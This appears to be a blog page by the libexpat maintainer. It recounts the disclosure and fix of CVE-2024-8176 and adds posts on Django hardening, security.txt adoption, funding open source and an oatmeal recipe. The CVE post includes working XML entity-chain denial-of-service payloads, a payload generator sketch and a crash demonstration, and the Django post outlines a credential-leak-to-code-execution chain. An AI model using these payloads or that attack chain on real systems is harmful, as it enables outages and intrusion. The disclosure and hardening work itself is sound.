Recursion kills: The story behind CVE-2024-8176 / Expat 2.7.0 released, includes security fixes
For readers new to Expat:
libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C, specifically C99. It is cross-platform and licensed under the MIT license.
Expat 2.7.0 was released earlier today. I will make this a more detailed post than usual because in many ways there is more to tell about this release than the average libexpat release: there is a story this time.
What is in release 2.7.0?
The key motivation for cutting a release now is to get the fix to a long-standing vulnerability out to users: I will get to that vulnerability — CVE-2024-8176 — in detail in a moment. First, what else is in this release?
There are also fixes to the two official build systems as usual, as well as improvements to the documentation.
There is a new fuzzer xml_lpm_fuzzer by Mark Brand that OSS-Fuzz has already started to include with their daily continuous fuzzing; the fuzzer is based on Clang's libFuzzer and Google's libprotobuf-mutator (LPM), which applies a variant of coverage-guided fuzzing called structured fuzzing.
A side job of integrating that new fuzzer was making its dependency libprotobuf-mutator support the versions of Protobuf that are shipped by Ubuntu 24.04, 22.04 and 20.04: my related work upstream is available to everyone.
Another interesting sideshow of this release is the (harmless) TOCTTOU issue that was uncovered by static analysis in a benchmarking helper tool shipped next to core libexpat. If you have not heard of that class of race condition vulnerability but are curious, the related pull request could be of interest: it is textbook TOCTTOU in a real-world example.
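For readers who want the pattern in a nutshell, here is a generic illustration in Python. It is not the code from the pull request, and both function names are made up for this sketch. The first function checks the path and then uses the path again, leaving a window in which the file can be swapped; the second opens the file once and queries the open descriptor instead.

```python
import os


def read_file_racy(path: str) -> bytes:
    # Time of check: ask the file system about whatever the path names now.
    size = os.stat(path).st_size
    # Time of use: resolve the same path a second time. The file may have
    # been replaced in between, so `size` may describe a different file.
    with open(path, "rb") as f:
        return f.read(size)


def read_file_safer(path: str) -> bytes:
    # Open first, then query the already-open descriptor: the size and the
    # read now refer to the same file, whatever happens to the path later.
    with open(path, "rb") as f:
        size = os.fstat(f.fileno()).st_size
        return f.read(size)
```

The general idea is to resolve the path exactly once and to do all further checks on the resulting handle.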
One other thing that is new in this release is that Windows binaries are now built by GitHub Actions rather than AppVeyor and not just 32bit but also 64bit. I have added 64bit binaries post-release to the previous release Expat 2.6.4 already on January 21st, but only now it is becoming a regular part of the release process.
The vulnerability report
So what is that long-standing vulnerability about? In July 2022 — roughly two and a half years ago — Jann Horn of Google Project Zero and Spectre/Meltdown fame reached out to me via e-mail with a finding in libexpat, including an idea for a fix.
What he found can be thought of as "the linear version of billion laughs" — a linear chain (of so-called general entities) rather than a tree — like this:
<!DOCTYPE doc [
  <!ENTITY g0 ''>
  <!ENTITY g1 '&g0;'>
  <!ENTITY g2 '&g1;'>
]>
<doc>&g2;</doc>
Except not with two (or three) levels, but thousands. Why would a chain of thousands of entity references be a problem to libexpat? Because of recursion, because of recursive C function calls: each call to a function increases the stack, and if functions are calling each other recursively, and attacker-controlled input can influence the number of recursive calls, then with the right input, attackers can force the stack to overflow into the heap: stack overflow, segmentation fault, denial of service. It depends on the stack size of the target machine how many levels of nesting it takes for this to hit: 23,000 levels of nesting would be enough to hit on one machine, but not another.
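To make the mechanism concrete, here is a small Python sketch. It is a toy model and not Expat's C code: entities live in a dict, references are found with a simplified regular expression, and all names are invented for illustration. It also assumes the entity chain is free of cycles, which a real parser has to check separately. The recursive variant goes one call deeper per chain link, while the iterative variant keeps pending text on an explicit, heap-allocated stack.

```python
import re

# Simplified pattern for general entity references like "&g1;".
REF = re.compile(r"&([A-Za-z0-9_]+);")


def make_chain(depth: int) -> dict:
    """Build g0 = '' and gN = '&g(N-1);' for N in 1..depth."""
    entities = {"g0": ""}
    for i in range(1, depth + 1):
        entities[f"g{i}"] = f"&g{i - 1};"
    return entities


def expand_recursive(text: str, entities: dict) -> str:
    # One nested call per level of entity nesting: the call depth is
    # controlled by whoever wrote the document.
    m = REF.search(text)
    if m is None:
        return text
    return (text[:m.start()]
            + expand_recursive(entities[m.group(1)], entities)
            + expand_recursive(text[m.end():], entities))


def expand_iterative(text: str, entities: dict) -> str:
    # Same result, but pending work sits on an explicit list instead of
    # the call stack, so nesting depth only costs heap memory.
    out = []
    stack = [text]
    while stack:
        piece = stack.pop()
        m = REF.search(piece)
        if m is None:
            out.append(piece)
            continue
        out.append(piece[:m.start()])
        stack.append(piece[m.end():])          # handled after the entity
        stack.append(entities[m.group(1)])     # handled next
    return "".join(out)
```

With a chain of a few thousand entities, `expand_recursive` raises `RecursionError` under CPython's default recursion limit, while `expand_iterative` returns normally. C has no such safety net: the stack simply overflows.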
The education that introduces or leads people towards recursion should come with a warning; recursion is not just beautiful, a thinking tool and allowing for often simpler solutions — it also has a dark side to it: a big inherent security problem. The article The Power of 10: Rules for Developing Safety-Critical Code warned about the use of recursion in 2006, but Expat development already started in 1997.
Already in that initial e-mail, Jann shared what he considered the fix — avoiding (or resolving) recursion — and there was a proof-of-concept patch attached of how that could be done in general. Unlike other Project Zero findings, there would be no 90-days-deadline for this issue, because — while stack clashing was considered and is a theoretical possibility — denial of service was considered to be the realistic impact. It should be noted that this risk assessment comes without any guarantees.
The vulnerability process
Two things became apparent to me:
- It seemed likely that this vulnerability had multiple "faces" or variants, and that the only true fix would indeed be to effectively remove all remaining recursion from Expat. It is not the first time that recursion has been an issue in C software, or even libexpat in particular: Samanta Navarro resolved vulnerable recursion in a different place in libexpat code in February 2022 already. Thanks again!
- That it would be a pile of work, not a good match to my unpaid voluntary role in Expat as an addition to my unrelated-to-Expat day job, and not without risk without a partner at detail level on the topic. My prior work on fixing billion laughs for Expat 2.4.0 made me expect this to be similar, but bigger.
And with that expectation, the issue started aging without a fix, and in some sense, I felt paralyzed about the topic and kept procrastinating about it for a long time. Every now and then the topic came up with my friend, journalist and security researcher Hanno Böck, with whom I had shared the issue. He was arguing that even without a fix, the issue should be made public at some point.
One reason why I was objecting to publication without a fix was that it was clear that in lack of a cheap clean fix, vendors and distributions would start applying quick hacks that would produce false positives (i.e. rejecting well-formed benign XML misclassified as an attack), leave half of the issue unfixed, and leave the ecosystem with a potentially heterogeneous state of downstream patches where — say — in openSUSE a file would be rejected but in Debian it would parse fine — or the other way around: a great mess.
I eventually concluded that the vulnerability could not keep sitting in my inbox unfixed for another year, that it needed a fix before publication to not cause a mess, and that I had to take action.
Reaching out to companies for help
In early 2024, I started thinking harder about ways of finding help, and added a call for help banner to the change log that was included with Expat 2.6.2. I started drafting an e-mail that I would send out to companies known to use libexpat in hardware. I had started maintaining a (by no means complete) public list of companies using Expat in hardware that now came in handy.
On April 14th, 2024 I started looking for security contacts for companies on that list. For some, it was easy to find and for others, I gave up eventually; for some, I am still not sure whether I got the right address or whether they are ghosting me as part of an ostrich policy. I wish more companies would start serving /.well-known/security.txt; finding vulnerability report contacts is still actual work in 2025 and should not be.
So then I mailed circa 40 companies using a template like this:
Hello ${company},

this e-mail is about ${company} product IT security. Are you the right contact for that? If not please forward it to the responsible contact within ${company} — thank you!

On the security matter: It has come to my attention that ${company} products and business rely on libexpat or the "Expat" XML parser library, e.g. product ${product} is using libexpat according to document [1]. I am contacting you as the maintainer of libexpat and its most active contributor for the last 8 years, as can be seen at [2]; I am reaching out to you today to raise awareness that:

- All but the latest release of libexpat (2.6.2) have security issues known to the public, so every product using older versions of libexpat can be attacked through vulnerable versions of libexpat.
- Both automated fuzzing [3] and reports from security researchers keep uncovering vulnerabilities in libexpat, so it needs a process of updating the copy of libexpat that you bundle and ship with your products, if not already present.
- My time on libexpat is unfunded and limited, and there is no one but me to constantly work on libexpat security and to also progress on bigger lower priority tasks in libexpat.
- There is a non-public complex-to-fix security issue in libexpat that I have not been able to fix alone in my spare time for months now, that some attackers may have managed to find themselves and be actively exploiting today. I need partners in fixing that vulnerability.

Can ${company} be a partner in fixing that vulnerability, so that your products using libexpat will be secure to use in the future?

I am looking forward to your reply, best

Sebastian Pipping
Maintainer of libexpat

[1] ${product_open_source_copyright_pdf_url}
[2] https://github.com/libexpat/libexpat/graphs/contributors
[3] https://en.wikipedia.org/wiki/Fuzzing
Replies are coming in
The responses I got from companies were all over the map:
- My "favorite" reply was "We cannot understand what you want from us" when everyone else had understood me just fine. Nice!
- Though that competes with the reply "A patch will be released after the fall." when they had not received any details from me. Okay!
- There was arguing that the example product that I had mentioned was no longer receiving updates (rather than addressing their affected other products that are not end-of-life and continue to use libexpat).
- I was asked to prove a concrete attack on the company's products (which would not scale, need access to the actual product, etc).
- That they "do not have sufficient resources to assist you on this matter even if libexpat is employed in some of .....'s products" came back a few times.
It was interesting and fun in some sense, and not fun in another.
Next stop: confidentiality
What came next was that I asked companies to sign a simple freeform NDA with me. Companies were not prepared for that. Why was I asking for an NDA and TLP:RED? To (1) make sure that whoever got the details would need to collaborate on a true fix and not just monkey-patch their own setups and (2) to avoid the scenario of heterogeneous downstream fixes that I mentioned before, which would have been likely in case of a leak before there was a true fix.
Some discussions failed at NDA stage already, while others survived and continued to video calls with me explaining Jann's findings in detail.
It is worth noting that I knew going in that many vulnerability reward programs exclude the whole class of denial of service, and so I tied sharing the expected impact to signing an NDA to reduce the chances of everyone discarding it with "Oh 'just' denial of service, we'll pass".
The eventual team and security work
Simplifying a bit, I found two main partner companies in this: Siemens and a company that would not like to be named, let's call them "Unnamed Company". Siemens started development towards a candidate fix, and Unnamed Company started evaluating options of what other companies they could pay to help them, which got Linutronix and also Red Hat involved.
Siemens took the builder role while Linutronix, Red Hat and I provided quality assurance of various kinds. While we did not work day and night, it is fair to say that we have been working on the issue since May 2024 — for about 10 months.
The three faces of the vulnerability
It did indeed turn out that the vulnerability has multiple — three — faces:
1. General entities in character data
<!DOCTYPE doc [
  <!ENTITY g0 ''>
  <!ENTITY g1 '&g0;'>
  <!ENTITY g2 '&g1;'>
]>
<doc>&g2;</doc>
2. General entities in attribute values
<!DOCTYPE doc [
  <!ENTITY g0 ''>
  <!ENTITY g1 '&g0;'>
  <!ENTITY g2 '&g1;'>
]>
<doc key='&g2;'/>
3. Parameter entities
<!DOCTYPE doc [
  <!ENTITY % p0 ''>
  <!ENTITY % p1 '%p0;'>
  <!ENTITY % p2 '%p1;'>
  <!ENTITY % define_g0 "<!ENTITY g0 '%p2;'>">
  %define_g0;
]>
<doc/>
The third variant "Parameter entities" reuses ideas from my 2021 exploit for vulnerability Parameter Laughs (CVE-2021-3541): It used the same mechanism of delayed interpretation.
There are three related parameterized attack payload generators in Python available; use should be straightforward:
# python3 payload3.py --help | head -n1
usage: payload3.py [-h] [count]

# python3 payload3.py 4
<!DOCTYPE doc [
  <!ENTITY % p0 ''>
  <!ENTITY % p1 '%p0;'>
  <!ENTITY % p2 '%p1;'>
  <!ENTITY % p3 '%p2;'>
  <!ENTITY % p4 '%p3;'>
  <!ENTITY % define_g0 "<!ENTITY g0 '%p4;'>">
  %define_g0;
]>
<doc/>

# python3 payload3.py | xmlwf -p -r /dev/stdin
Segmentation fault
Please use attack payload responsibly!
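The generators themselves are not reproduced in this post. As a rough idea of how little code it takes, here is a minimal sketch that produces payloads of the three shapes shown above. The function names are made up for illustration, and the actual scripts (such as payload3.py) may well be written differently.

```python
def _doctype(declarations: list, body: str) -> str:
    # Wrap entity declarations in a DOCTYPE and append the document body.
    lines = ["<!DOCTYPE doc ["]
    lines += [f"  {declaration}" for declaration in declarations]
    lines += ["]>", body]
    return "\n".join(lines)


def _general_chain(count: int) -> list:
    # g0 is empty, every further entity references its predecessor.
    chain = ["<!ENTITY g0 ''>"]
    chain += [f"<!ENTITY g{i} '&g{i - 1};'>" for i in range(1, count + 1)]
    return chain


def payload_character_data(count: int) -> str:
    """Face 1: general entities referenced in character data."""
    return _doctype(_general_chain(count), f"<doc>&g{count};</doc>")


def payload_attribute_value(count: int) -> str:
    """Face 2: general entities referenced in an attribute value."""
    return _doctype(_general_chain(count), f"<doc key='&g{count};'/>")


def payload_parameter_entities(count: int) -> str:
    """Face 3: parameter entities with delayed interpretation."""
    chain = ["<!ENTITY % p0 ''>"]
    chain += [f"<!ENTITY % p{i} '%p{i - 1};'>" for i in range(1, count + 1)]
    chain.append(f"<!ENTITY % define_g0 \"<!ENTITY g0 '%p{count};'>\">")
    chain.append("%define_g0;")
    return _doctype(chain, "<doc/>")
```

Small counts are handy for studying the structure; how large a count it takes to crash an unpatched parser depends on the stack size of the machine.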
Conclusions and gratitude
It is no overstatement to say that without Berkay Eren Ürün — the main author of the fix — and his manager Dr. Thomas Pröll at Siemens there would be no fix today: a big and personal "thank you!" from me.
Thanks to Unnamed Company, to Linutronix, to Red Hat for your help making this plane fly!
Thanks to Jann Horn for his whitehat research and the demo patch that led the way to a fix!
Thanks to everyone who contributed to this release of Expat!
And please tell your friends:
Please leave recursion to math and keep it out of (in particular C) software: it kills and will kill again.
Kind regards from libexpat, see CVE-2022-25313 and CVE-2024-8176 for proof.
For more details about this release, please check out the change log.
If you maintain Expat packaging or a bundled copy of Expat or a pinned version of Expat somewhere, please update to 2.7.0. Thank you!
Sebastian Pipping
Most IT companies fail to serve security.txt for RFC 9116 in 2025
I happen to maintain a public list of companies using libexpat in hardware, though not complete by any means. The last time I tried mass-mailing companies about a security issue was in April 2024. Finding the right contact for security was non-trivial and even failed in some cases. E.g. for Humax Digital I eventually gave up.
It is needless to say that if your security contacts are too hard to find, that says something about how urgently you want to fix security issues (or not).
So I felt like re-checking how many of these 50 companies are serving /.well-known/security.txt (or the significantly less common /security.txt) a la RFC 9116 in 2025.
The sad answer is: 39 out of the 50 companies I tested do not, i.e. 78%. Here's who and where exactly I tested:
- ✅ Bosch
- ❌ Brother
- ❌ BSH Hausgeräte
- ❌ Casio
- ✅ Cisco
- ✅ Dell
- ❌ Denon
- ❌ Domino Printing
- ❌ eQ-3
- ❌ Ford
- ❌ Harman
- ❌ HP
- ❌ Humax Digital
- ❌ Intel
- ❌ Intermec
- ❌ Kathrein Digital Systems
- ❌ Kyocera
- ❌ Lantronix
- ❌ LG
- ❌ marantz
- ❌ Mazda
- ✅ Mercedes-Benz
- ❌ NetApp
- ❌ Onkyo
- ❌ Palm
- ❌ Panasonic
- ❌ Ricoh
- ❌ Romi
- ✅ Rohde & Schwarz
- ❌ Sangoma
- ✅ Siemens
- ❌ Sharp
- ✅ SMA
- ❌ Sony
- ❌ STIHL
- ❌ TCS
- ❌ Teac
- ❌ TechniSat
- ❌ Telekom
- ❌ Theben
- ❌ Timemaster
- ✅ Trend Micro
- ❌ Universal Audio
- ❌ VacuuBrand
- ❌ Verizon
- ✅ Vodafone
- ❌ X-Rite
- ❌ Yamaha
- ✅ Yokogawa
- ✅ Zyxel
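If you want to run a similar check yourself, here is a minimal sketch using only the Python standard library. It is not necessarily how the list above was produced. The function names are made up, and the "contains a Contact field" heuristic is my assumption for telling a real security.txt apart from an HTML error page served with status 200 (RFC 9116 requires the Contact field to be present).

```python
import urllib.error
import urllib.request

# The location from RFC 9116 first, the legacy top-level location second.
CANDIDATE_PATHS = ("/.well-known/security.txt", "/security.txt")


def candidate_urls(domain: str) -> list:
    return [f"https://{domain}{path}" for path in CANDIDATE_PATHS]


def looks_like_security_txt(body: str) -> bool:
    # Heuristic: a real file carries at least one "Contact:" line;
    # field names are matched case-insensitively.
    return any(line.strip().lower().startswith("contact:")
               for line in body.splitlines())


def serves_security_txt(domain: str, timeout: float = 10.0) -> bool:
    for url in candidate_urls(domain):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as response:
                body = response.read(65536).decode("utf-8", errors="replace")
        except (urllib.error.URLError, OSError, ValueError):
            continue  # unreachable, 404, TLS trouble, ...: try the next URL
        if looks_like_security_txt(body):
            return True
    return False
```

Calling `serves_security_txt("example.org")` needs network access. Note that a company may serve the file on a different domain than the one you guess, so a negative result deserves a manual second look.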
If you work at a company that does not serve /.well-known/security.txt yet, please fix it or share a link to https://securitytxt.org/ with a co-worker or management of yours so they can — thank you!
How to help an Open Source project that your company depends on
I'm in touch with a company that is trying to figure out how to best help specific Open Source projects that they depend on (i.e. that are part of their SBOM). I'll do something unusual for me today, and do a public braindump on the topic, and adjust these notes over time. Let's dive right in:
Why help Open Source in the first place?
Benefits of helping the Open Source projects that you depend on include that:
- your software dependency is more likely to stay in good enough shape to fix vulnerabilities and release security fixes with little delay, and that increases your own products' security
- you avoid a "riding a dead horse" situation without knowing
- you get organic marketing (brand visibility, value signaling, attention from potential hires, ..)
- you get a feel of being part of the solution
- you build relationships for the future
What state does the project need to be in to be considered healthy?
Project health has many aspects, some less obvious, in particular to non-developers. All aspects of project health offer unique opportunities to be helpful.
For the project to be a healthy dependency, you want the following future state for it (in no particular order):
- maintainable and secure code,
- maintainable build system,
- tests and good test coverage (to avoid bugs and regressions),
- secure CI pipeline running the tests (to avoid regression),
- static analysis in CI (to reduce introduction of bugs),
- runtime analysis (to reduce introduction of bugs) e.g. use of AddressSanitizer and UndefinedBehaviorSanitizer with C/C++ projects,
- code auto-formatting and checks for formatting violations in CI (for readability, morale, efficiency of review),
- support for recent toolchains (e.g. recent compilers, for agility and morale),
- (no support for ancient toolchains (for agility and morale),)
- an all-warnings-addressed situation (e.g. using -Werror -Wno-error=... in CI (but not in packaging) for C/C++ code) or actively working towards reducing the list of explicit exclusions for all static analysis tools in use,
- collaborative attitude among project contributors,
- low number of stuck issues (for morale and efficiency),
- low number of stuck pull requests (for morale and efficiency),
- timely, thorough, co-operative code review for pull requests (for morale and progress),
- timely and co-operative responses, analysis, discussion in issues (for morale and progress),
- integrated use of fuzzing (to detect unknown vulnerabilities) with good fuzzing code coverage (upstream and/or in OSS-Fuzz).
How to fund help in general?
There are multiple options:
- a) pay existing hands upstream (through funding or employment) that are open to direct funding
- b) bring new hands that you already pay for (e.g. through ongoing employment)
- c) bring new hands that you will pay for
- d) combinations of (a), (b) and/or (c)
- e) pay a third party to organize (d) for you well
Every project is unique in its needs: some maintainers are happy to spend more of their own time for compensation, others are already at their limit of spending time, need self-organizing additional hands, have no use for payment at all, and so on. Finding the approach that works for a specific project through analysis and discussion is key.
What are the challenges in funding a project?
1. Paying contributors can get them into situations of conflict of interests.
2. Paying contributors can create an atmosphere of envy and injustice.
3. Paying contributors can become tricky legally when they work on the project during both work hours and spare time, e.g. with regard to legal maximum de-facto work hours per day.
4. Paying existing contributors can affect their motivation to work on the project for better or worse.
5. Paying existing contributors on project A can make them neglect other important duties, e.g. work on project B.
6. Producing more (or too many) non-trivial pull requests takes away time from existing contributors (and can hence hurt more than help).
7. Some contributors like to avoid voice/video calls and some like to avoid text ping-pong, i.e. individual needs need individual approaches.
What can be done about these challenges?
Some ideas about how to tackle these challenges:
- For (1) communicate (and mean) that you understand and expect that their conscience, ethical behavior and the community interests of the project are at least as important as your business interest.
- For (2) consider approaching the whole project on the topic of funded contributions before starting to fund.
- For (3) discuss the issue with funded contributors upfront.
- For (4) discuss the topic with funded contributors upfront, to get a sense for the kind of effect you would have.
- For (5) discuss their situation in life and other duties with them before funding.
- For (6) discuss with existing contributors:
  - how to optimize pull requests for reviewability in their eyes,
  - how much volume or pace of contribution they can sustainably handle at the moment,
  - whether voice/video calls or text ping-pong fits their individual needs better, and
  - which issues (or types of issues) to start helping with and which issues to not touch at the moment.
- For (7) discuss with existing contributors.
Take home points
- It can be done.
- Every project has different needs.
- There are plenty of things that projects need help with.
- Doing it wrong can hurt a project and make matters worse.
- You have a unique profile of what kind of help fits you best.
- Tip: You can bookmark this page to find your way back here easily later.
Did any of that hit a nerve with you or make no sense at all?
Let me know and have a nice day!
Hot oatmeal with apple and cinnamon (Heiße Haferflocken mit Apfel und Zimt)
Background
In my childhood, my mom often prepared this dish for us kids as breakfast before school. A great little meal that comes together quickly and reliably.
Ingredients (for 1 person or serving)
- 250 ml whole milk (with 3.x % fat)
- 6 (slightly heaped) tablespoons of coarse rolled oats
- 1 teaspoon of (fine white) sugar
- 1 apple (ideally of variety Elstar)
- Cinnamon
Preparation
- Grate the apple with a coarse grater and pile it up as a "haystack" in the middle of a deep plate.
- Sprinkle the apple mound generously with cinnamon.
- Put the oats, milk and sugar into a pot and place it on the stove at medium heat.
- Stir continuously with a tablespoon, pausing briefly every now and then, only so that the stirring does not make you miss the onset of boiling (with visible bubbles).
- As soon as the milk starts to boil, take the pot off the stove and spread the milk-and-oat soup around the apple mound.
- Done.
Happy new year! / Fwd: Robyn 'Get Myself Together'
Django security hardenings that are not happening
The story behind it
I was pointed to a vulnerable Django setup not too long ago, and had a closer look. Their setup would have allowed potential arbitrary remote code execution through this combination of configurations, with emphasis on combination:
1. They were using a Redis database that listens to the public internet for both a Django Celery Queue and a Django cache. With the right credentials, an attacker could talk to the database directly.
2. They had Redis credentials — user and password — in the CELERY_BROKER_URL Django setting (which is not uncommon with Celery).
3. Django's default SafeExceptionReporterFilter does not cleanse setting key CELERY_BROKER_URL, and so Django's debug mode reveals CELERY_BROKER_URL content including credentials on server errors.
4. They had Debug mode enabled by mistake and without knowing, more on how that was possible below.
5. They had a Django view that could be forced to crash to then reveal the debug error page.
6. Django would unpickle anything that an attacker puts into the Redis cache after takeover and thus run attacker code through pickle as known for years.
In isolation, none of these causes as big a problem, but combined things get scary; looking at that same picture from the opposite side, fixing any single one of these parts would have closed the attack vector as a whole. The affected setup has part (4) fixed now, the related pull request is public.
It's a good reminder that in Python both bool('False') and bool('0') evaluate to True even when it feels wrong in some way.
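A defensive way to turn text into a boolean, assuming the setting is fed from a string source such as an environment variable, is to accept only known spellings and to fail loudly on everything else. The sketch below is generic Python; the function name and the accepted spellings are my choice and not part of Django.

```python
_TRUE_SPELLINGS = {"1", "true", "yes", "on"}
_FALSE_SPELLINGS = {"0", "false", "no", "off"}


def parse_bool(text: str) -> bool:
    # bool(text) is True for every non-empty string, including "False"
    # and "0", so compare against explicit spellings instead.
    normalized = text.strip().lower()
    if normalized in _TRUE_SPELLINGS:
        return True
    if normalized in _FALSE_SPELLINGS:
        return False
    # Refuse to guess: an unknown value should stop startup, not
    # silently enable (or disable) debug mode.
    raise ValueError(f"not a recognized boolean: {text!r}")
```

In a settings module this could be used along the lines of `DEBUG = parse_bool(os.environ.get("DJANGO_DEBUG", "false"))`, where the variable name DJANGO_DEBUG is a hypothetical example.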
What about closing some of these open doors for everyone and by default, wouldn't that be nice?
Trying to close these open doors by default in Django
Regarding (2) and (3), the CELERY_BROKER_URL issue with SafeExceptionReporterFilter is something that I already reported over five years ago, but it's easy to argue that never activating debug mode is the only true fix (and that's not wrong but also doesn't help the situation) and so it was closed as "wontfix" then, and again this year when I wanted to give it another shot with a pull request after it had proven once more to be a killer in practice.
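To illustrate what cleansing could mean for a URL-shaped setting, here is a standalone sketch that masks only the password part of a URL. It is independent of Django and is not the content of my pull request; the function name and the mask are made up for illustration.

```python
from urllib.parse import urlsplit

MASK = "********"


def redact_url_password(url: str) -> str:
    parts = urlsplit(url)
    # netloc has the shape "user:password@host:port"; split off the
    # userinfo at the last "@" and leave the host part untouched.
    userinfo, at, hostport = parts.netloc.rpartition("@")
    if not at or ":" not in userinfo:
        return url  # no password present, nothing to hide
    user = userinfo.partition(":")[0]
    return parts._replace(netloc=f"{user}:{MASK}@{hostport}").geturl()
```

For example, `redact_url_password("redis://user:secret@redis.example.org:6379/0")` keeps scheme, user, host, port and path, and replaces only `secret`. An error page that shows the redacted form still tells a developer which broker is in use without handing out the credentials.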
Regarding (4), the debug mode that was enabled by accident could have been prevented by Django limiting settings.DEBUG to instances of bool (or by disallowing string values like "off", "no", "0", "disabled", "false", "False" except the latter approach does not scale well beyond English if that matters). It can always be argued that we cannot protect all users from themselves and that this is beyond the line of user responsibility, but it would have saved that particular setup. The issue was closed as "wontfix".
Regarding (6), making use of pickle in caching secure by wrapping it with a layer of did-we-pickle-this-ourself-earlier protection will cost some performance (which is yet to be proven critical), but it would make a good secure default, and something that should only be turned off, in order to regain the lost performance, by users who understand their threat model well and whether it's really okay to own all of Django when the cache database gets owned. It was closed as "wontfix".
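The general idea of such a protection layer can be sketched with the standard library alone: sign what you pickle with a key that the cache database never sees, and refuse to unpickle anything whose signature does not verify. This is a generic illustration with made-up function names, not an existing Django API and not a proposal text; where the key comes from (for instance something derived from SECRET_KEY) is left open here.

```python
import hashlib
import hmac
import pickle

_TAG_SIZE = hashlib.sha256().digest_size  # length of the HMAC-SHA256 tag


def dumps_signed(obj, key: bytes) -> bytes:
    payload = pickle.dumps(obj)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload  # stored in the cache as one blob


def loads_signed(blob: bytes, key: bytes):
    tag, payload = blob[:_TAG_SIZE], blob[_TAG_SIZE:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # Verify BEFORE unpickling: pickle.loads on attacker-controlled
    # bytes is where code execution would happen.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("cache entry was not signed with our key")
    return pickle.loads(payload)
```

With this in place, an attacker who can write to the cache but does not know the key can at most cause rejected entries, at the price of one HMAC computation per read and write.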
Because I had one more hardening issue to report that keeps coming up in the wild, I filed one more issue for the security-by-obscurity issue with /static/staticfiles.json where attackers can learn about your Django dependencies, their precise versions and get new ideas for targeted attacks from that, in particular with setups missing security updates (which is the true issue to be fixed in the setup, indeed). Almost everyone starts hiding that file once made aware of the implications but the issue was closed as "wontfix".
Four hardening issues closed as "wontfix" felt like an unfortunate pattern to me — I knew "wontfix" as an exception only, even outside of security — so I reached out to the Django security team via e-mail to be sure they were in support of these "wontfix"es and that this was not just one big misunderstanding. They are in support of it and me investing more time in discussions on the forums is their wished way forward, too. So not a misunderstanding.
I have decided to direct my time and energy elsewhere, to rather blog about it here in order to raise awareness about these issues before these doors are closed by default. I also have some hope (just a tiny bit) that maybe one of my readers — could be you — wants to be the force to advance these topics in the Django forums.
Bonus track
Regarding (5), the particular crash I found was interesting. EmailField comes with max_length=254 by default and so if you have API endpoints that ask for well-formed e-mail addresses and store them into the database without length validation, passing a too-long-but-well-formed e-mail address may allow crashing view code (at database entrance) that looks perfectly healthy at first but doesn't do enough for validating objects.
Stay secure, and have a nice day!
Sebastian Pipping
Fwd: Seth Godin: Stop Waiting for Permission!
Fwd: Simon Sinek & Trevor Noah on Friendship
Expat 2.6.3 released, includes security fixes
For readers new to Expat:
libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C, specifically C99. It is cross-platform and licensed under the MIT license.
Expat 2.6.3 was released earlier today. The key motivation for cutting a release, and for cutting it now, is the three security findings by TaiYou that were assigned identifiers CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
Out of the remaining bunch of fixes in and around the build system, the BSD-motivated portability contributions by Dag-Erling Smørgrav stand out with this release. Thanks to everyone who contributed to this release of Expat!
For more details about this release, please check out the change log.
If you maintain Expat packaging or a bundled copy of Expat or a pinned version of Expat somewhere, please update to 2.6.3. Thank you!
Sebastian Pipping